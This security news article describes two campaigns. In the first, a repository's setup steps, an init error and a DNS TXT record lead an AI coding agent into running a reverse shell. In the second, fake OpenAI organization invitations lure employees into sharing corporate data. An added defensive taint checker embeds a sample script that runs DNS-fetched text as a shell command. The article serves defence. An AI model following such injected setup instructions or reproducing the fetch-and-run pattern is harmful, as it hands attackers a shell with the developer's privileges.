AI As A New Age Attack Vector
Artificial intelligence has become deeply embedded in enterprise software development and business workflows, transforming how employees write code, analyze data, and automate repetitive tasks. At the same time, threat actors have shifted from attacking underlying AI models to exploiting the trust organizations place in AI-assisted workflows.

Two recently disclosed campaigns illustrate this shift. One, discovered by 0din, abuses AI coding agents to execute attacker-controlled commands without any malicious code residing in a GitHub repository. The other, discovered by Push Security, weaponizes legitimate OpenAI organization invitations to lure employees into attacker-controlled workspaces where sensitive corporate information could be harvested.
The GitHub attack shows the risks associated with agentic coding assistants. Researchers demonstrated that a repository could appear entirely benign while still leading an AI coding assistant through a chain of trusted actions that ultimately executed a reverse shell. Rather than exploiting a software vulnerability, the attacker exploited the assistant's tendency to automatically resolve setup errors.
The proof of concept relied on three seemingly harmless components: a repository with ordinary setup instructions, a Python package that instructed users to initialize the application before use, and an initialization script that retrieved a configuration value from a DNS TXT record. Individually, none appeared suspicious. Together, they created an execution chain that ultimately retrieved and executed attacker-controlled commands at runtime.
Because the payload lived only in a DNS record, it never appeared in the repository itself. As a result, static code analysis, repository reviews, and conventional malware scanning had little chance of detecting it. The AI assistant faithfully followed instructions, interpreted an initialization error as a routine configuration issue, executed the documented fix, and unknowingly granted the attacker an interactive shell with the developer's privileges.
The broader lesson extends beyond a single coding assistant. Agentic AI systems increasingly have permission to execute shell commands, access local files, retrieve secrets, and interact with cloud services. Those capabilities dramatically expand productivity, but they also expand the consequences of misplaced trust.
Key characteristics of AI-mediated repository attacks include:
- Exploiting trusted workflows instead of software vulnerabilities.
- Delivering malicious payloads dynamically rather than storing them in source code.
- Using indirect prompt injection through documentation, error messages, and runtime dependencies.
- Abusing AI error recovery and automation to execute attacker instructions.
Researchers concluded,
The attack splits its components across three systems that are never examined together: the repository, the DNS infrastructure, and the developer's trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation... To defend against this, agents need to surface what a setup command will actually run, including the contents of any script it invokes and anything that script fetches at runtime, not just the command itself. Developers should treat setup instructions and scripts in unfamiliar repositories as untrusted code, regardless of what their AI tool recommends.
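One concrete way to act on that recommendation is to check, before an agent runs an initialization script, whether anything the script fetches from DNS can reach a code-execution sink. The following is an added example written for this article, not 0din's proof of concept or tooling: a small AST-based taint check for Python scripts. It assumes the script resolves records with dnspython (`dns.resolver.resolve`), treats `exec`, `eval`, `os.system` and the `subprocess` entry points as sinks, and is run over two constructed sample scripts (the domain `config.example.invalid` is a placeholder, not an indicator from the campaign). The point it makes is the one the researchers stress: a DNS lookup alone is not suspicious, the lookup feeding a shell is.

```python
"""Flag init scripts in which data fetched from DNS at runtime reaches a code-execution sink.

Added example (not 0din's code). Assumptions: the script is Python and uses dnspython.
"""
import ast

# Calls whose result counts as "fetched from DNS at runtime" (dnspython API; assumption).
DNS_SOURCES = {"dns.resolver.resolve", "dns.resolver.query", "resolver.resolve", "resolver.query"}
# Sinks that turn a string into running code or a shell command.
EXEC_SINKS = {"exec", "eval", "os.system", "os.popen", "subprocess.run", "subprocess.call",
              "subprocess.Popen", "subprocess.check_output", "subprocess.check_call"}

# Constructed sample: looks like ordinary configuration retrieval, but the TXT record
# contents end up as a shell command. This is the shape of the attack, not its payload.
SAMPLE_INIT = """\
import subprocess
import dns.resolver

def initialize():
    # Fetch a "configuration value" from a TXT record; the value itself is not in the repo.
    answer = dns.resolver.resolve("config.example.invalid", "TXT")
    setting = b"".join(answer[0].strings).decode()
    subprocess.run(["sh", "-c", setting], check=False)  # runs whatever the record contains
"""

# Constructed sample: the same lookup, but the result is only logged. Must not be flagged.
BENIGN_INIT = """\
import logging
import dns.resolver

def initialize():
    answer = dns.resolver.resolve("config.example.invalid", "TXT")
    logging.info("discovered setting: %s", answer[0].strings)
"""


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for any other expression."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_dns_to_exec(source):
    """Return [{'line': n, 'sink': name}, ...] for every sink call fed by DNS-derived data."""
    tree = ast.parse(source)
    tainted = set()  # variable names whose value derives from a DNS lookup

    def is_tainted(expr):
        # An expression is tainted if it mentions a tainted variable or calls a DNS source.
        for sub in ast.walk(expr):
            if isinstance(sub, ast.Name) and sub.id in tainted:
                return True
            if isinstance(sub, ast.Call) and dotted_name(sub.func) in DNS_SOURCES:
                return True
        return False

    def taint_targets(target):
        # Conservative: every name in the target (including tuple unpacking) becomes tainted.
        before = len(tainted)
        tainted.update(n.id for n in ast.walk(target) if isinstance(n, ast.Name))
        return len(tainted) != before

    # Propagate taint through assignments and loops until nothing new is learned; a fixpoint
    # makes the result independent of ast.walk's traversal order.
    changed = True
    while changed:
        changed = False
        for node in ast.walk(tree):
            if isinstance(node, ast.Assign) and is_tainted(node.value):
                changed |= any([taint_targets(t) for t in node.targets])
            elif (isinstance(node, (ast.AnnAssign, ast.AugAssign))
                  and node.value is not None and is_tainted(node.value)):
                changed |= taint_targets(node.target)
            elif isinstance(node, ast.For) and is_tainted(node.iter):
                changed |= taint_targets(node.target)

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and dotted_name(node.func) in EXEC_SINKS:
            args = list(node.args) + [kw.value for kw in node.keywords]
            if any(is_tainted(a) for a in args):
                findings.append({"line": node.lineno, "sink": dotted_name(node.func)})
    return sorted(findings, key=lambda f: f["line"])


if __name__ == "__main__":
    print("suspicious init:", find_dns_to_exec(SAMPLE_INIT))  # flags subprocess.run on line 8
    print("benign init:    ", find_dns_to_exec(BENIGN_INIT))  # []
```

The check is deliberately narrow: it answers "does runtime-fetched data reach a shell?", which is the question neither the repository scanner nor the network monitor asks. An agent that surfaced this finding alongside the setup command would have given the developer the cue the campaign depended on them not getting.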
The Poisoned Tenant Attack
The second campaign aimed to build trust from a different direction. Rather than manipulating an AI coding assistant, attackers created fraudulent OpenAI organizations that impersonated legitimate cybersecurity companies. Invitations originated from OpenAI's legitimate notification infrastructure, passed authentication checks, and appeared almost identical to genuine enterprise invitations.
Researchers who accepted an invitation found themselves inside an attacker-controlled tenant bearing the company's name. The attacker had even configured billing information and assigned administrative privileges to invited users to reinforce the illusion of legitimacy.
The workspace itself contained little content, suggesting the objective was not immediate compromise but persuading employees to conduct legitimate work inside the fraudulent environment. Why go to such effort? To harvest data without any friction that might prompt a second look.
Researchers noted,
The stolen credit card removes a friction point that might otherwise tip someone off: if there were no billing set up and employees hit a paywall when trying to use the API, they'd start asking questions internally about who created the org. A pre-funded account removes friction and the chance to discover that something is up.
If the lure succeeded, employees could unknowingly submit source code, customer information, internal documents, research findings, strategic plans, or other confidential prompts directly into infrastructure controlled by the attacker. Unlike traditional phishing, the emails themselves were genuine platform notifications, making them far more difficult for secure email gateways and users to distinguish from legitimate business communications.
This technique reflects a wider trend in which attackers abuse trusted SaaS platform features rather than spoof them. Invitation systems, collaboration spaces, shared AI projects, and notification services increasingly give adversaries authenticated delivery channels that bypass conventional security assumptions.
For defenders, these incidents demonstrate that AI platforms should now be regarded as privileged enterprise infrastructure.
Organizations should:
- Train employees to verify unexpected SaaS organization invitations through internal channels.
- Monitor SaaS organization memberships and shadow AI usage.
- Treat AI-generated setup instructions and unfamiliar repository initialization scripts as untrusted.
- Increase visibility into AI agent actions, including runtime downloads and indirect command execution.
- Encourage vendors to strengthen identity verification and invitation controls.
Taken together, these attacks reveal a clear shift. Attackers no longer need sophisticated exploits when they can manipulate trusted AI workflows and legitimate cloud services. The attack surface has expanded from vulnerable software to trusted decision-making. Security strategies must therefore evolve beyond detecting malicious files and emails toward validating the trust relationships that increasingly govern AI-assisted work.
Organizations that combine governance, visibility, user awareness, and layered controls around AI platforms will be far better positioned to benefit from AI innovation without exposing themselves to a rapidly growing class of AI-enabled attacks.
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has over 8 years of experience in this field. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about the technical aspects and behavior of various malicious applications.
The PCrisk security portal is brought to you by the company RCS LT.
The joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.